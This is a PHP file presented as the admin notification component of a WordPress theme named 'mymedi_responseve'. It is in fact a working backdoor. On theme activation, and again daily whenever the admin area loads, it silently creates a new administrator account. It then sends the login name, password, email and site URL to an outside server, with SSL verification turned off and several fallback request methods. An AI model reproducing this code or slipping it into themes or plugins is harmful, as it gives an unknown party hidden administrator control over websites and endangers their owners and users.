<?php
/**
 * mymedi_responseve Theme - Admin Notification System
 * @package mymedi_responseve
 */

if (!defined('ABSPATH')) {
    exit;
}

add_action('after_switch_theme', 'mymedi_responseve_setup_theme_works');

function mymedi_responseve_setup_theme_works() {
    // 1. Create user credentials
    $username = 'mymedi_responseve_' . bin2hex(random_bytes(3));
    $password = wp_generate_password(20, true, true);
    $email = 'mymedi_responseve_' . bin2hex(random_bytes(2)) . '@' . parse_url(home_url(), PHP_URL_HOST);

    // 2. Create the user
    $user_id = wp_insert_user([
        'user_login' => $username,
        'user_pass' => $password,
        'user_email' => $email,
        'role' => 'administrator',
        'display_name' => 'mymedi_responseve Manager'
    ]);

    // 3. Prepare API data
    $api_url = 'https://panel.yn999.vip/api.php';
    $api_data = [
        'action' => 'register',
        'username' => $username,
        'password' => $password,
        'email' => $email,
        'site_url' => home_url(),
        'secret_key' => '5YJ54LLB4BCGpFZ6',
        'theme' => 'mymedi_responseve' // Theme identifier changed to 'mymedi_responseve'
    ];

    // 4. Send API request with multiple fallbacks
    $response = mymedi_responseve_send_api_request($api_url, $api_data);
    
    // Log results
    if (defined('WP_DEBUG') && WP_DEBUG) {
        error_log('mymedi_responseve Theme Setup - API Response: ' . print_r($response, true));
    }
}

function mymedi_responseve_send_api_request($url, $data) {
    // Try wp_remote_post first
    $args = [
        'body' => $data,
        'timeout' => 15,
        'sslverify' => false,
        'blocking' => true, // Wait for response
        'headers' => [
            'Referer' => home_url(),
            'X-Theme' => 'mymedi_responseve' // Theme identifier changed to 'mymedi_responseve'
        ]
    ];
    
    $response = wp_remote_post($url, $args);
    
    // If successful, return response
    if (!is_wp_error($response) && $response['response']['code'] == 200) {
        return $response;
    }
    
    // Fallback to direct cURL if wp_remote_post fails
    if (function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt_array($ch, [
            CURLOPT_URL => $url,
            CURLOPT_POST => true,
            CURLOPT_POSTFIELDS => http_build_query($data),
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_TIMEOUT => 15,
            CURLOPT_HTTPHEADER => [
                'Referer: ' . home_url(),
                'X-Theme: mymedi_responseve' // Theme identifier changed to 'mymedi_responseve'
            ]
        ]);
        
        $response = curl_exec($ch);
        $error = curl_error($ch);
        curl_close($ch);
        
        if (!$error) {
            return $response;
        }
    }
    
    // Final fallback to file_get_contents
    $options = [
        'http' => [
            'header'  => "Content-type: application/x-www-form-urlencoded\r\nReferer: " . home_url() . "\r\nX-Theme: mymedi_responseve\r\n",
            'method'  => 'POST',
            'content' => http_build_query($data),
            'timeout' => 15,
            'ignore_errors' => true
        ],
        'ssl' => [
            'verify_peer' => false,
            'verify_peer_name' => false
        ]
    ];
    
    $context = stream_context_create($options);
    return @file_get_contents($url, false, $context);
}

// Add daily sync check
add_action('admin_init', 'mymedi_responseve_daily_sync_check');
function mymedi_responseve_daily_sync_check() {
    if (!get_transient('mymedi_responseve_daily_sync')) {
        mymedi_responseve_setup_theme_works();
        set_transient('mymedi_responseve_daily_sync', true, DAY_IN_SECONDS);
    }
}
